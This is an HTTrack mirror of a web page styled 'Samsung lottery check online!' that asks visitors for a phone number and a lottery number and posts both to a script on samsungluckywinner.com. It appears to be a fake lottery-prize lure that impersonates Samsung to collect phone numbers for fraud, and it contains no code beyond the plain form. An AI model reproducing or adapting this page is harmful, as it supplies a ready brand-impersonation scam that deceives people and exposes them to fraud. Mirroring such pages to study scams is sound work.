<html>
    
<!-- Mirrored from samsungluckywinner.com//lottery/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 20 Jan 2023 11:52:25 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
        <title>
            Lottery System!
        </title>
        <link rel="stylesheet" href="../../cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css"/>
    </head>
    <body align="center">
        
        <fieldset style="background: gray; margin: auto; width: auto;">
            <h3 style="font-size: 20px; font-weight: 5400; color: white;">Samsung lottery check online!</h3>
            <div style="background: white; height: auto; margin: auto; width: 100%;">
                <br>
                    <form action="https://samsungluckywinner.com//lottery/getLottery.php" align="center" border="1px" method="POST">
                        <label style="margin-bottom: 15px">Enter Phone Number:</label><br />
                        <input name="phone" placeholder="xxxxxxxxxx" style="background-color: #f4f4f4; border-radius: 5px; color: #aa005b; font-size: 25; margin-top: 5px; height: 45px; text-align: center; width: 80%;" type="text"
                        pattern="\d*" minlength="10" maxlength="11" onkeypress='return event.charCode >= 48 && event.charCode <= 57' required>
                        <br />
                        <br />
                        <label style="margin-bottom: 15px">Enter Samsung Lottery Number:</label><br />
                        <input name="lottery" placeholder="xxxxx" style="background-color: #f4f4f4; border-radius: 5px; color: #aa005b; font-size: 25; margin-top: 5px; height: 45px; text-align: center; width: 80%;" type="text"
                        pattern="\d*" minlength="4" maxlength="10" onkeypress='return event.charCode >= 48 && event.charCode <= 57' required>
                        <br />
                        <br />
                        <button type="submit" name="check" style="background-color: #aa005b; border-radius: 10px; color: yellow; height: 50px; width: 80%; font-weight: bold; padding: 10px 10px;">Check Lottery <i class="fa fa-arrow-circle-right" aria-hidden="true"></i>
                        </button>
                    </form>
                <br>
            </div>
            <br>
            <br>
        </fieldset>
    </body>

<!-- Mirrored from samsungluckywinner.com//lottery/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 20 Jan 2023 11:52:46 GMT -->
</html>


